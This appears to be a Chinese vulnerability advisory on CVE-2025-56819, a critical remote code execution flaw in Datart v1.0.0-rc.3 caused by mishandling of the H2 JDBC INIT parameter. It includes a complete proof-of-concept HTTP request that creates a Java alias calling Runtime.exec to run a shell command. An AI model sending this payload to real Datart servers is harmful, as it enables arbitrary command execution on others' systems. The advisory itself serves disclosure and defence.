Datart 可视化平台漏洞CVE-2025-56819

Datart 是 running-elephant 团队开发的新一代开源数据可视化开放平台，采用 Java 和 Vue.js 开发，支持 Docker 容器部署，提供收费版。

一、基本情况

Datart 可视化开放平台支持多种关系型和非关系型数据库，如 MySQL、PostgreSQL、MongoDB、Hive 等，满足不同企业数据存储需求。

Datart 支持多种数据库的接入，可进行实时查询和可视化，能与第三方系统进行集成，界面设计简洁美观，支持扩展自定义数据源与图表。

栋科技漏洞库关注到Datart v.1.0.0-rc.3中存在一个安全漏洞，该漏洞现在已经被追踪为CVE-2025-56819，该漏洞的CVSS 3.X评分为9.8。

二、漏洞分析

CVE-2025-56819漏洞是存在于Datart v.1.0.0-rc.3版本中的高风险安全漏洞，使得远程攻击者能够通过INIT connection参数执行任意代码。

具体来说，该漏洞源于INIT连接参数处理不当。

三、POC概念验证

 POST /api/v1/data-provider/test HTTP/1.1
 Host: test.com:8080
 Content-Type: application/json
 Content-Length: 520

 {
   "name": "jdbc-data-provider",
   "type": "JDBC",
   "properties": {
     "dbType": "H2",
     "url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL EXEC ('touch /tmp/test1')\\;",
     "user": null,
     "password": "",
     "driverClass": "org.h2.Driver",
     "serverAggregate": false,
     "enableSpecialSQL": false,
     "enableSyncSchemas": true,
     "syncInterval": "60",
     "properties": {}
   }
 }

四、影响范围

Datart v.1.0.0-rc.3

五、修复建议

未知

六、参考链接

管理员已设置登录后刷新可查看